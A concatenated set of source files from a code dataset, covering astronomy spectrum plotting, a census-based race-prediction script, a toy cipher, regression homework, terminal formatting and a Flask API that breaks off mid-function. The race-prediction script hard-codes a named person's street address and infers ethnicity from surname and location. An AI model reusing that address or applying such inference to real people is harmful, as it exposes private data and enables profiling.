self.detectedlines.readTableColumn(1, 'wave_ident_iter')\n self.wave_iter = self.detectedlines.column\n self.detectedlines.readTableColumn(1, 'res_xpos')\n self.res_xpos = self.detectedlines.column\n\n def plotXVsY(self, subplot, title, tooltip):\n #We first plot all the detected lines\n self.xydisplay.setLabels('Xpos [pix]','Ypos [pix]')\n self.xydisplay.setColor('black')\n self.xydisplay.display(subplot, title, tooltip, self.x_pix,\n self.y_pix)\n #We then overplot the identified lines in the second iteration\n self.xydisplay.setColor('lightgreen')\n self.xydisplay.display(subplot, title, tooltip,\n self.x_pix_iter[numpy.isfinite(self.wave_iter)],\n self.y_pix_iter[numpy.isfinite(self.wave_iter)])\n #And then we overplot the identified lines in the first iteration\n self.xydisplay.setColor('green')\n self.xydisplay.display(subplot, title, tooltip, \n 
self.x_pix[numpy.isfinite(self.wave)],\n self.y_pix[numpy.isfinite(self.wave)])\n\n def plotResVsWave(self, subplot, title, tooltip, excluded_lines = None):\n self.resdisplay.setLabels('Wavelength [Ang]','Residual [pix]')\n self.resdisplay.setColor('black')\n self.resdisplay.display(subplot, title, tooltip, \n self.wave[numpy.isfinite(self.res_xpos)],\n self.res_xpos[numpy.isfinite(self.res_xpos)])\n if excluded_lines is not None :\n for line in excluded_lines : \n subplot.axvline(line, linestyle='solid',color='red')\n\n\nclass PlotableSkylinesOffsets :\n def __init__(self, fits_skylines_off):\n self.skylines_off = PipelineProduct(fits_skylines_off)\n self.resdisplay = ScatterDisplay()\n self.loadFromFits()\n\n def loadFromFits(self) :\n #Reading the slylines offset table\n nslits = self.skylines_off.getTableNcols(1) - 1\n\n skylines_wave = self.skylines_off.readTableColumn(1, 'wave')\n self.allskylines_wave = list()\n self.allwave_res = list()\n \n for col in range(nslits) :\n self.allskylines_wave.extend(skylines_wave)\n wave_res = self.skylines_off.readTableColumn(1, col + 1)\n self.allwave_res.extend(wave_res)\n \n def plot(self, subplot, title, tooltip):\n self.resdisplay.setLabels('Wavelength [Ang]','Residual [Ang]')\n self.resdisplay.setColor('black')\n self.resdisplay.setPointSize(7)\n self.resdisplay.display(subplot, title, tooltip, \n self.allskylines_wave, self.allwave_res)\n\n\nclass PlotableExtractedScience :\n def __init__(self, fits_extractedscience):\n self.obj_id = -1\n self.extractedscience = PipelineProduct(fits_extractedscience)\n self.spectrumdisplay = SpectrumDisplay()\n self.loadFromFits()\n\n def loadFromFits(self) :\n #Reading the flat image\n self.extractedscience.readImage()\n self.nobj = self.extractedscience.image.shape[0]\n self.crpix1 = self.extractedscience.readKeyword('CRPIX1', 0)\n self.crval1 = self.extractedscience.readKeyword('CRVAL1', 0)\n self.cdelt1 = self.extractedscience.readKeyword('CD1_1', 0)\n self.bunit = self.extractedscience.readKeyword('BUNIT', 0)\n self.nwave = self.extractedscience.image.shape[1]\n self.wave = numpy.arange(1, self.nwave+1, 1)\n self.wave = (self.wave - self.crpix1) * self.cdelt1 + self.crval1\n if(self.obj_id == -1) : # Select brightest\n self.selectBrightest()\n self.setFluxSelected()\n\n def selectBrightest(self):\n if self.nobj == 1:\n self.obj_id = 1\n median = 0\n for obj in range(self.nobj) :\n new_median = numpy.median(self.extractedscience.image[obj,:]) \n if new_median > median :\n median = new_median\n self.obj_id = obj + 1\n \n def setFluxSelected(self) :\n self.flux = self.extractedscience.image[self.obj_id-1,:]\n\n def selectObject(self, obj_id):\n self.obj_id = obj_id\n self.setFluxSelected()\n\n def plot(self, subplot, title, tooltip):\n\n self.spectrumdisplay.setLabels('Lambda', 'Total Flux ['+self.bunit+']')\n self.spectrumdisplay.display(subplot, title, tooltip, self.wave, self.flux,\n autolimits = True)\n\nclass PlotableSpecPhot :\n def __init__(self, fits):\n self.resp = PipelineProduct(fits)\n self.respdisp = SpectrumDisplay()\n self.tabdisp = ScatterDisplay()\n self.flat_sed = False\n self.loadFromFits()\n\n def loadFromFits(self) :\n self.wave = self.resp.readTableColumn(1, 'WAVE')\n self.wave_obs = self.resp.readTableColumn(2, 'WAVE')\n self.std_ref_flux = self.resp.readTableColumn(1, 'STD_FLUX')\n self.std_obs_flux = self.resp.readTableColumn(1, 'OBS_FLUX')\n if 'RESPONSE' in self.resp.all_hdu[2].columns.names :\n self.fit_response = self.resp.readTableColumn(2, 'RESPONSE')\n self.raw_response = 
self.resp.readTableColumn(1, 'RAW_RESPONSE')\n else :\n self.fit_response = self.resp.readTableColumn(2, 'RESPONSE_FFSED')\n self.raw_response = self.resp.readTableColumn(1, 'RAW_RESPONSE_FFSED')\n self.flat_sed = True\n self.used_fit = self.resp.readTableColumn(1, 'USED_FIT')\n self.raw_response_nonnull = self.raw_response[self.raw_response > 0]\n self.wave_nonnull = self.wave[self.raw_response > 0]\n self.wave_used = self.wave[self.used_fit > 0]\n self.raw_response_used = self.raw_response[self.used_fit > 0] \n\n def plotResponse(self, subplot, title, tooltip):\n self.respdisp.setLabels('Angstrom','10^ (-16) erg/(cm^ (-2) e-)')\n self.respdisp.flux_lim = 0., numpy.max(self.raw_response_nonnull) * 1.1\n self.respdisp.display(subplot, title, tooltip, self.wave_obs, self.fit_response, autolimits = False)\n subplot.scatter(self.wave_nonnull, self.raw_response_nonnull, color='darkblue')\n subplot.scatter(self.wave_used, self.raw_response_used, color='lightgreen')\n\n def plotStdExtracted(self, subplot, title, tooltip):\n self.respdisp.setLabels('Angstrom','e-/ (s Angstrom)')\n std_obs_flux_nonnull = self.std_obs_flux[self.std_obs_flux > 0]\n wave_nonnull = self.wave[self.std_obs_flux > 0]\n self.respdisp.display(subplot, title, tooltip,\n wave_nonnull, std_obs_flux_nonnull, autolimits = True)\n\n def plotStdTabulated(self, subplot, title, tooltip):\n self.tabdisp.setLabels('Angstrom','10^ (-16) erg/(cm^ (-2) e-)')\n self.tabdisp.display(subplot, title, tooltip, self.wave, self.std_ref_flux)\n\nclass PlotableStdTabRedFlux :\n def __init__(self, reducedfluxstd_fits, reducedstd_fits, specphot_fits):\n self.reducedfluxstd = PlotableExtractedScience(reducedfluxstd_fits)\n self.reducedstd = PlotableExtractedScience(reducedstd_fits)\n self.specphot = PlotableSpecPhot(specphot_fits)\n self.tabstddisp = ScatterDisplay()\n self.stdreddisp = ScatterDisplay()\n self.loadFromFits()\n\n def loadFromFits(self) :\n #This will select the brightest spectrum, which is the criteria\n #used to extract the standard star\n self.reducedfluxstd.loadFromFits()\n self.reducedstd.loadFromFits()\n self.specphot.loadFromFits()\n self.std_ref_flux_nonnull = self.specphot.std_ref_flux[self.specphot.raw_response > 0]\n self.std_ref_flux_used = self.specphot.std_ref_flux[self.specphot.used_fit > 0]\n \n\n def plotStdTabRedFlux(self, subplot, title, tooltip) :\n self.tabstddisp.setLabels('Angstrom','10^ (-16) erg/(cm^ (-2) Angstrom)')\n self.tabstddisp.setLimits(self.reducedfluxstd.wave[0],\n self.reducedfluxstd.wave[len(self.reducedfluxstd.wave)-1],\n 0.,\n numpy.max(self.reducedfluxstd.flux) * 1.1)\n self.tabstddisp.setColor('red') \n self.tabstddisp.display(subplot, title, tooltip, \n self.reducedfluxstd.wave, self.reducedfluxstd.flux)\n self.tabstddisp.setColor('darkblue') \n self.tabstddisp.setPointSize(20) \n subplot.scatter(self.specphot.wave, self.specphot.std_ref_flux)\n subplot.scatter(self.specphot.wave_used, self.std_ref_flux_used, color='lightgreen')\n\n\n def plotStdRed(self, subplot, title, tooltip) :\n self.stdreddisp.setLabels('Angstrom','10^ (-16) erg/(cm^ (-2) Angstrom)')\n self.stdreddisp.setLimits(self.reducedstd.wave[0],\n self.reducedstd.wave[len(self.reducedstd.wave)-1],\n 0.,\n numpy.max(self.reducedstd.flux) * 1.1) \n self.stdreddisp.setColor('red') \n self.stdreddisp.display(subplot, title, tooltip, \n self.reducedstd.wave, 
self.reducedstd.flux)\n\n\n\n","sub_path":"forspy/fors_plot_common.py","file_name":"fors_plot_common.py","file_ext":"py","file_size_in_byte":18930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"403038318","text":"import os\nimport sys\nimport joblib\nimport datetime\nimport requests\nimport numpy as np\nimport pandas as pd\nimport censusgeocode as cg\n\nos.environ['R_HOME'] = '/Library/Frameworks/R.framework/Resources'\nimport rpy2.robjects as robjects\nfrom rpy2.robjects import pandas2ri\nfrom rpy2.robjects.packages import importr\n\ncensus_key = os.getenv('CENSUS_KEY')\n\npd.set_option('max_columns', 1000)\npd.set_option('max_info_columns', 1000)\npd.set_option('expand_frame_repr', False)\npd.set_option('display.max_rows', 30000)\npd.set_option('max_colwidth', 4000)\npd.set_option('display.float_format', lambda x: '%.3f' % x)\n\n\ndef feature_create(df):\n df['age'] = (pd.datetime.today() - pd.to_datetime(df['birth_date'])).dt.days / 365.25\n df['sex'] = df['gender'].apply(lambda x: 0 if x == 'Male' else 1) # coded as 0 for Male and 1 for Female because that is the definition used in wru.predict_race\n return df\n\ndef _geocode_batch(df):\n df[['street_address', 'city', 'postal_abbreviation', 'code']].dropna().to_csv('/Users/travis.howe/Downloads/test_address2.csv', header=False, index=True)\n return pd.DataFrame(cg.addressbatch('/Users/travis.howe/Downloads/test_address2.csv', returntype='geographies')) # I have to send in a .csv file\n\ndef predict_prep(df):\n df['id'] = df.index\n census_vars = ['id', 'countyfp', 'tract', 'block']\n obs_vars = ['id', 'last_name', 'age', 'sex', 'postal_abbreviation']\n\n df_census = _geocode_batch(df)[census_vars]\n df_census['id'] = df_census['id'].astype(int)\n\n return df[obs_vars].merge(df_census, how='outer', on='id', indicator=True).\\\n drop(['id', '_merge'], 1).\\\n rename(columns={'last_name': 'surname', 'postal_abbreviation': 'state', 'countyfp': 'county'})\n\ndef race_predict(df):\n # todo: why are there missing counties?\n df = df.query('(county != \"None\") and (county == county)')\n df.set_index([[1]], inplace=True)\n\n r = robjects.r\n pandas2ri.activate()\n wru = importr('wru') # https://github.com/kosukeimai/wru\n\n # df.loc[3, 'surname'] = 'Althaus'\n\n # df.dropna(inplace=True)\n df['age'] = df['age'].apply(lambda x: round(x))\n\n census_data = joblib.load('data_files/census_data_all_states_county.pkl')\n X_out = wru.predict_race(voter_file=df, census_geo='county', census_key=census_key, sex=True, age=True, census_data=census_data)\n print(pandas2ri.ri2py(X_out))\n\n census_data = joblib.load('data_files/census_data_all_states_tract.pkl')\n X_out = wru.predict_race(voter_file=df, census_geo='tract', census_key=census_key, sex=True, age=True, census_data=census_data)\n print(pandas2ri.ri2py(X_out))\n\n# todo: block?\n\ndef _convert_to_pandas(r_lst, level):\n r = robjects.r\n l = r.length(r_lst)\n print(l)\n\n df = pd.DataFrame()\n for region in range(l): # includes \"DC\" in addition to the fifty states\n print(r_lst[region][0])\n print(r_lst[region][1])\n print(r_lst[region][2])\n print(r_lst[region][3])\n df = df.append(pandas2ri.ri2py(r_lst[region][3]))\n return df\n\n\ndef download_census_data(level):\n r = robjects.r\n pandas2ri.activate()\n wru = importr('wru')\n\n states = [\"AL\", \"AK\", \"AZ\", \"AR\", \"CA\", \"CO\", \"CT\", \"DC\", \"DE\", \"FL\", \"GA\",\n \"HI\", \"ID\", \"IL\", \"IN\", \"IA\", \"KS\", \"KY\", \"LA\", \"ME\", \"MD\",\n \"MA\", \"MI\", \"MN\", 
\"MS\", \"MO\", \"MT\", \"NE\", \"NV\", \"NH\", \"NJ\",\n \"NM\", \"NY\", \"NC\", \"ND\", \"OH\", \"OK\", \"OR\", \"PA\", \"RI\", \"SC\",\n \"SD\", \"TN\", \"TX\", \"UT\", \"VT\", \"VA\", \"WA\", \"WV\", \"WI\", \"WY\"]\n\n X_out = wru.get_census_data(census_key, states, age=True, sex=True, census_geo=level)\n\n joblib.dump(X_out, 'census_data_all_states_{}.pkl'.format(level))\n joblib.dump(_convert_to_pandas(X_out, level), 'census_data_all_states_{}_pd.pkl'.format(level))\n\n\ndef main():\n\n # joblib.dump(_convert_to_pandas(joblib.load('census_data_all_states_county.pkl'), 'county'), 'census_data_all_states_{}_pd.pkl'.format(level))\n # sys.exit()\n\n # download_census_data('county')\n download_census_data('tract')\n download_census_data('block')\n\n\n\nif __name__ == '__main__':\n # main()\n # sys.exit()\n\n #example\n # pd.DataFrame([['Howe', '809 Logan Ave', 'Belton', 'MO', '64012', 35, 0]], columns=['last_name', 'street_address', 'city', 'postal_abbreviation', 'code', 'age', 'sex']). \\\n pd.DataFrame([['Young', '6700 W 138th Ter', 'Overland Park', 'KS', '66223', 26, 0]], columns=['last_name', 'street_address', 'city', 'postal_abbreviation', 'code', 'age', 'sex']). \\\n pipe(predict_prep). \\\n pipe(race_predict)\n\n\n\n# todo: download the census data so don't have to query the website whenever I want to generate a prediction\n# todo: there is likely a better way to county data from address...look into this.\n\n# todo: Althaus Jr; changing it to Althaus solved the problem.\n# todo: some people don't have ages, gender\n# todo: age can't be decimal\n# todo: does census_geo='tract', census_geo='block' give a different answer\n# todo: what to do if a person doesn't get a race estimate\n\n# todo: is there anything I can do to increase the number of matches---about 89% of observations have a match\n\n","sub_path":"coding/R/rpy2/wru/wru.py","file_name":"wru.py","file_ext":"py","file_size_in_byte":5136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"124294577","text":"#ROW TRANSPOSITION\nimport numpy as np\n\nstr=input(\"Enter the string : \")\nkey=int(input(\"Enter the key\"))\nl=[]\nprint(\"enter the priority order :\")\n\nfor i in range(key):\n l.append(int(input()))\n\nr=l\nt=[]\nfor i in str:\n t.append(i)\n \nif(len(t)!=key*key and len(t)<=key*key):\n for i in range((key**2)-len(t)):\n t.append('X')\nelif(len(t)>key*key):\n print(\"INVALID INPUT\")\n\na=np.array(t)\nma=a.reshape(key,key)\nprint(\"MATRIX FORMED IS :\\n\",ma)\n\nprint(\"\\nORDER IS : \")\nfor i in l:\n print(i,end=\" \")\n\nci=\"\" \ntemp=len(l)\np=[]\np=p+l\nfor i in range(temp):\n f=min(p)\n for j in range(temp):\n ci=ci+ma[j][l.index(f)]\n p.remove(f)\n \nprint(\"\\nCipher Text : \",ci)\n","sub_path":"coltrans.py","file_name":"coltrans.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"479411754","text":"import numpy as np\nimport scipy as sp\nimport math\nfrom sklearn.preprocessing import PolynomialFeatures\nfrom sklearn import linear_model\nfrom numpy import linalg as LA\nfrom numpy import genfromtxt\n\n# import the data from the .csv file to a 100x4 array. 
Randomize its order\ndata = genfromtxt('HW03/D3.csv', delimiter=',')\n#print data\nrandomData = np.array(data)\nnp.random.shuffle(randomData)\n\n# Select training data of size 70 (first 70 rows in randomized dataset).\nq1TrainArray = randomData[0:70, [0,1,2,3]]\n# Select testing data of size 30 (following rest of the 30 rows in randomized dataset)\nq1TestArray = randomData[70:100, [0,1,2,3]]\nprint (\"==================================================================\")\n\ndef runAlgo():\n print (\"Length of training data: \" , len(q1TrainArray))\n print (\"Length of testing data : \" , len(q1TestArray))\n # Make xTrain[x1,x2,x3], yTrain[column4]\n xTrain = q1TrainArray[:, [0,1,2]]\n yTrain = q1TrainArray[:, [3]]\n\n # Make xTest[x1,x2,x3], yTest[column4]\n xTest = q1TestArray[:, [0,1,2]]\n yTest = q1TestArray[:, [3]]\n\n # solve for a line l which minimizes the SSE(P,l). This line equation is the model. \n # Build the model from the training data.\n clf = linear_model.LinearRegression()\n clfFit = clf.fit(xTrain, yTrain)\n coefficents = clfFit.coef_[0]\n coefficents = np.array(coefficents)\n\n # Predicts the value of y using the found Model for the tuple of x values (x1,x2,x3, ...)\n # y = a0 + a1x1+ a2x2 + ...\n def predictY(xTuple):\n return (clfFit.intercept_ + (coefficents[0] * xTuple[0]) + (coefficents[1] * xTuple[1]) + (coefficents[2] * xTuple[2]))\n\n # Finds the SSE\n def sse():\n sumE = 0\n for i in range(0,len(xTest)):\n yHat = predictY(xTest[i])[0]\n #print (yHat)\n r = (yTest[i] - yHat)**2\n #print(\"r:\" , r)\n sumE = sumE + r\n return sumE\n\n # Predict y for (1,1,1), (2,0,4), (3,2,1)\n y1 = predictY([1,1,1])\n y2 = predictY([2,0,4])\n y3 = predictY([3,2,1]) \n\n print (\"Coefficients [a1, ..., an]: \", clfFit.coef_[0])\n print (\"Intercept (a0) : \", clfFit.intercept_)\n print (\"SSE : \", sse())\n print (\"x = (1,1,1), yPredict = \", y1)\n print (\"x = (2,0,4), yPredict = \", y2)\n print (\"x = (3,2,1), yPredict = \", y3)\n print (\"==================================================================\")\n \nrunAlgo()\n\n# Select training vs testing data (90,10)\nq1TrainArray = randomData[0:90, [0,1,2,3]]\nq1TestArray = randomData[90:100, [0,1,2,3]]\nrunAlgo()\n\n# Select training vs testing data (67,33)\nq1TrainArray = randomData[0:67, [0,1,2,3]]\nq1TestArray = randomData[67:100, [0,1,2,3]]\nrunAlgo()\n\n# Select training vs testing data (80,20)\nq1TrainArray = randomData[0:80, [0,1,2,3]]\nq1TestArray = randomData[80:100, [0,1,2,3]]\nrunAlgo()\n","sub_path":"Linear Regression/multiVarLinearRegression.py","file_name":"multiVarLinearRegression.py","file_ext":"py","file_size_in_byte":2893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"653660255","text":"\r\nimport pickle\r\nfrom MLModelFunctions import *\r\nimport matplotlib.pyplot as plt\r\nfrom ControlParameters import *\r\n\r\n\r\nXLABEL = 'Time Recording Length'\r\n\r\n# loading da pickle\r\ninfile = open(\"allStatsDataPickle\", 'rb')\r\nstatsDict = pickle.load(infile)\r\nprint(\"stats loaded\")\r\n\r\nxlabel = 'Time recording length'\r\nnplot = 0\r\n# For each state: stand, walkFL, walkFR\r\nfor state in statsDict:\r\n\r\n # Label for title\r\n stateLabel = state.split(\"CSVData\")[0]\r\n\r\n # x-axis time samples\r\n time_records = []\r\n\r\n # collect value of each\r\n dic_Prec = {}\r\n dic_Recall = {}\r\n dic_F1 = {}\r\n dic_Sup = {}\r\n list_Accuracy = []\r\n # each time sample\r\n for filename in statsDict[state]:\r\n sr, tr = 
splitControlsfromName(filename)\r\n time_records.append(int(tr))\r\n \r\n jsonResult = statsDict[state][filename]\r\n \r\n for intentkey in jsonResult:\r\n # if intentkey == 'accuracy':\r\n # list_Accuracy.append(jsonResult[intentkey]['accuracy'])\r\n \r\n # check for numbers (intention)\r\n try:\r\n int(intentkey)\r\n except ValueError:\r\n continue\r\n\r\n # Accumulate per intent <- new value in list of time samples \r\n try:\r\n dic_Prec[intentkey] += [jsonResult[intentkey]['precision']]\r\n except KeyError:\r\n dic_Prec[intentkey] = [jsonResult[intentkey]['precision']]\r\n \r\n try:\r\n dic_Recall[intentkey] += [jsonResult[intentkey]['recall']]\r\n except KeyError:\r\n dic_Recall[intentkey] = [jsonResult[intentkey]['recall']]\r\n \r\n try:\r\n dic_F1[intentkey] += [jsonResult[intentkey]['f1-score']]\r\n except KeyError:\r\n dic_F1[intentkey] = [jsonResult[intentkey]['f1-score']]\r\n \r\n try:\r\n dic_Sup[intentkey] += [jsonResult[intentkey]['support']]\r\n except KeyError:\r\n dic_Sup[intentkey] = [jsonResult[intentkey]['support']]\r\n \r\n # -- All metrics across stationary state done\r\n ## Plot accuracy\r\n # plt.figure(nplot)\r\n # time_plot, pltPrec = zipsort(time_records, list_Accuracy)\r\n # plt.plot(time_plot, list_Accuracy)\r\n # plt.title(stateLabel + \" Accuracy Plot\")\r\n # plt.xlabel(XLABEL)\r\n # plt.ylabel(\"Accuracy\")\r\n # plt.legend()\r\n # plt.show()\r\n # nplot += 1\r\n \r\n \r\n \r\n ## Plot Precision\r\n plt.figure(nplot)\r\n for intent in dic_Prec:\r\n time_plot, pltPrec = zipsort(time_records, dic_Prec[intent])\r\n plt.plot(time_plot, pltPrec, label=ALLSTATES_DIC[int(intent)])\r\n \r\n plt.title(stateLabel + \" Precision Plot\")\r\n plt.xlabel(XLABEL)\r\n plt.ylabel(\"Precision\")\r\n plt.legend()\r\n plt.show()\r\n nplot +=1\r\n \r\n \r\n \r\n ## Plot Recall\r\n plt.figure(nplot)\r\n for intent in dic_Recall:\r\n time_plot, pltRecall = zipsort(time_records, dic_Recall[intent])\r\n plt.plot(time_plot, pltRecall, label=ALLSTATES_DIC[int(intent)])\r\n \r\n plt.title(stateLabel + \" Recall Plot\")\r\n plt.xlabel(XLABEL)\r\n plt.ylabel(\"Recall\")\r\n plt.legend()\r\n plt.show()\r\n nplot += 1\r\n \r\n \r\n \r\n ## Plot F1-Score\r\n plt.figure(nplot)\r\n for intent in dic_Recall:\r\n time_plot, pltF1 = zipsort(time_records, dic_F1[intent])\r\n plt.plot(time_plot, pltF1, label=ALLSTATES_DIC[int(intent)])\r\n \r\n plt.title(stateLabel + \" F1_Score Plot\")\r\n plt.xlabel(XLABEL)\r\n plt.ylabel(\"F1_Score\")\r\n plt.legend()\r\n plt.show()\r\n nplot += 1\r\n \r\n \r\n \r\n ## Plot Support?\r\n","sub_path":"AutomationPipeline/TimeIntent/MLEvaluation.py","file_name":"MLEvaluation.py","file_ext":"py","file_size_in_byte":3678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"5551297","text":"import os\nimport subprocess\n\nimport os_bridge\n\n\ndef upline(lines):\n return subprocess.check_output(['tput', 'cuu', '%s' % lines])\n\n\n_eraseline = None\n\n\ndef eraseline():\n global _eraseline\n if not _eraseline:\n _eraseline = subprocess.check_output(['tput', 'el'])\n return _eraseline\n\n\ndef set_cursor_visible(visible):\n if visible:\n subprocess.call(['tput', 'cnorm'])\n else:\n subprocess.call(['tput', 'civis'])\n\n\ndef set_line_wrap_enabled(enabled):\n subprocess.call(['tput', ('smam' if enabled else 'rmam')])\n\n\ndef progress_bar(current, max):\n if current >= max:\n return green('[' + '=' * max + ']')\n elif current <= 0:\n return green('[') + yellow('-') * max + green(']')\n else:\n return green('[' + '=' * 
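\n                 # [added note] e.g. progress_bar(3, 10) yields '[==>-------]' before\n                 # the green/yellow color codes are applied.\n                 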
(current - 1) + '>') + yellow(\n '-' * (max - current)) + green(']')\n\n\ndef terminal_rows():\n return int(subprocess.check_output(['tput', 'lines']))\n\n\ndef terminal_columns():\n return int(subprocess.check_output(['tput', 'cols']))\n\n\ndef tail_file(file):\n try:\n FNULL = open(os.devnull, 'wb')\n return \"%s--> %s\" % (\n eraseline(),\n subprocess.check_output(['tail', '-n', '1', file], stderr=FNULL).rstrip()\n )\n except subprocess.CalledProcessError:\n return \"[No output]\"\n\n\n# unscrupulously ripped from fabric's colors.py\n\ndef _wrap_with(code):\n def inner(text, bold=False):\n if not os_bridge.is_terminal_colorable():\n return text\n c = code\n\n if bold:\n c = \"1;%s\" % c\n return \"\\033[%sm%s\\033[0m\" % (c, text)\n\n return inner\n\n\nred = _wrap_with('31')\ngreen = _wrap_with('32')\nyellow = _wrap_with('33')\nblue = _wrap_with('34')\nmagenta = _wrap_with('35')\ncyan = _wrap_with('36')\nwhite = _wrap_with('37')\n","sub_path":"sanic/console_formatting.py","file_name":"console_formatting.py","file_ext":"py","file_size_in_byte":1679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"366610872","text":"#import packages\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom pandas import Timestamp\r\n\r\n\r\n#read the file\r\ndf = pd.read_csv('台灣電力公司_過去電力供需資訊.csv')\r\ntemp_sub = {'date': [],'peak_load(MW)':[]}\r\nsub_df = pd.DataFrame(data=temp_sub)\r\n\r\n#setting index as date\r\ndf['日期'] = pd.to_datetime(df.日期,format='%Y%m%d')\r\ndf.index = df['日期']\r\n\r\n#creating dataframe with date and the target variable\r\ndata = df.sort_index(ascending=True, axis=0)\r\nnew_data = pd.DataFrame(index=range(0,len(df)),columns=['日期', '尖峰負載(MW)'])\r\n\r\nfor i in range(0,len(data)):\r\n new_data['日期'][i] = data['日期'][i]\r\n new_data['尖峰負載(MW)'][i] = data['尖峰負載(MW)'][i]\r\n\r\n#train\r\ntrain = new_data[:]\r\n\r\nnew_data.shape, train.shape\r\n((424, 2), (424, 2))\r\n\r\ntrain['日期'].min(), train['日期'].max()\r\n\r\n(Timestamp('2018-01-24 00:00:00'),\r\nTimestamp('2019-02-28 00:00:00'))\r\n\r\n#make predictions by using moving average\r\npreds = []\r\nfor i in range(0,7):\r\n a = train['尖峰負載(MW)'][len(train)-7+i:].sum() + sum(preds)\r\n b = a/7\r\n preds.append(b)\r\n sub_df=sub_df.append({'date': '2019040'+str(i+2),'peak_load(MW)':b}, ignore_index=True)\r\n\r\n\r\n\r\n#output\r\nsub_df.set_index('date' , inplace=True)\r\nsub_df.to_csv('submission.csv')\r\n\r\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"122152126","text":"# have to run this with python3\n\nimport sys\n\nprint (f\"sys.argv = {sys.argv}\")\n\nfilename = sys.argv[1]\nprint (f\"filename = {filename}\")\n\noutfile = sys.argv[2]\nprint (f\"outfile = {outfile}\")\n\nletters = [ 'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z']\n\n# make it to dictionary for faster searching\nletters_dict = {}\nfor l in letters:\n\tletters_dict[l] = l\nletters = letters_dict\n\ndef sentence_start(data, i):\n\tif not data[i] in letters:\n\t\treturn False\n\n\tif i == 0:\n\t\treturn True\n\n\tj = i - 1\n\n\t# have to be a new line\n\tif data[j] != '\\n':\n\t\treturn False\n\n\twhile j >= 0:\n\t\tif data[j] != ' ' and data[j] != '\\t' and data[j] != '\\n' and data[j] != '\\r' and data[j] != '(' and data[j] != \"'\" and data[j] != '\"' and data[j] != ')':\n\t\t\tbreak\n\t\tj -= 1\n\n\tif j < 
0:\n\t\treturn True\n\n\tif data[j] == '.' or data[j] == '?' or data[j] == '!':\n\t\treturn True\n\n\tif data[j] == '-' and j > 8:\n\t\tall_dash = True\n\t\tfor k in range(j-8, j):\n\t\t\tif data[k] != '-':\n\t\t\t\tall_dash = False\n\t\t\t\tbreak\n\t\tif all_dash == True:\n\t\t\treturn True\n\n\treturn False\n\nwith open(filename, 'r') as myfile:\n\tdata = myfile.read()\n\tdata2 = str(data)\n\tprint (f\"len(data) = {len(data)}\")\n\tfor i in range(len(data)):\n\t\tif sentence_start(data, i):\n\t\t\tdata2 = data2[:i] + data[i].upper() + data[i+1:]\n\nassert (len(data2) == len(data))\nwith open(outfile, 'w') as f:\n\tf.write(data2)\n\tprint (f\"data is written to {outfile}\")\n","sub_path":"z_others/mk_1st_letter_cap/make_1st_letter_capital_v2.py","file_name":"make_1st_letter_capital_v2.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
+{"seq_id":"50974033","text":"from django.db import models\r\nfrom tools.base import CategoryModel\r\n\r\nclass TipoMaterial(CategoryModel):\r\n    \"\"\"\r\n    Describes the types of materials usable in the machines\r\n    \"\"\"\r\n\r\n    unidad = models.CharField(\r\n        max_length=16,\r\n        null=True,\r\n        blank=True,\r\n        help_text=('indica la unidad con la que debería medirse el material.'\r\n                   'ej. \"g\", \"cm^2\"')\r\n    )\r\n\r\n    class Meta:\r\n        verbose_name = 'material'\r\n        verbose_name_plural = 'materiales'","sub_path":"trabajos/models/tipos.py","file_name":"tipos.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
+{"seq_id":"459300285","text":"'''\n    Defines behavior for each api address\n'''\nimport ast\nfrom flask import request, make_response, jsonify, abort\nfrom server import app\nfrom server.models import db, User, Post, Option, Vote\nimport sqlalchemy.exc\nimport json\n\ndb.create_all()\n\n\n@app.errorhandler(404)\ndef not_found(error):\n    return make_response(jsonify({'error': error.description}), 404)\n\n\n@app.errorhandler(400)\ndef bad_request(error):\n    return make_response(jsonify({'error': error.description}), 400)\n\n\n@app.errorhandler(409)\ndef already_exists(error):\n    return make_response(jsonify({'error': error.description}), 409)\n\n\n@app.errorhandler(500)\ndef internal_error(error):\n    return make_response(jsonify({'error': 'internal server error'}), 500)\n\n\n@app.route('/users/<uuid>', methods=['GET'])\ndef get_user(uuid):\n    response = {}\n    user = User.query.filter_by(uuid=uuid).first()\n    if user:\n        response['user'] = user.uid\n    else:\n        # return jsonify({'test':'test'}), 200\n        abort(404, 'user with id %s not found' % uuid)\n    return jsonify(response)\n\n\n@app.route('/users', methods=['POST'])\ndef create_user():\n    response = {}\n    uuid = request.form.get('uuid')\n    if uuid is None:\n        abort(404, 'no uuid entered')\n    else:\n        user = User(uuid)\n        try:\n            db.session.add(user)\n            db.session.commit()\n            response['message'] = 'created'\n        except sqlalchemy.exc.IntegrityError:\n            abort(409, 'uuid already exists')\n        except:\n            abort(500, 'Internal server error')\n    return jsonify(response)\n\n\n@app.route('/users/<uuid>/posts', methods=['GET'])\ndef get_posts_by_user(uuid):\n    user = User.query.filter_by(uuid=uuid).first()\n\n    if user is None:\n        abort(404, 'user with uuid %s not found' % uuid)\n\n    results_per_page = 10\n    # start on page 0 by default\n    try:\n        page = int(request.args.get('page', 0))\n    except ValueError:\n        abort(400, 'page was not a number')\n\n    posts = user.posts[page * results_per_page: 
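\n                      # [added note] pagination: page N covers posts [N*results_per_page,\n                      # (N+1)*results_per_page) of user.posts.\n                      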
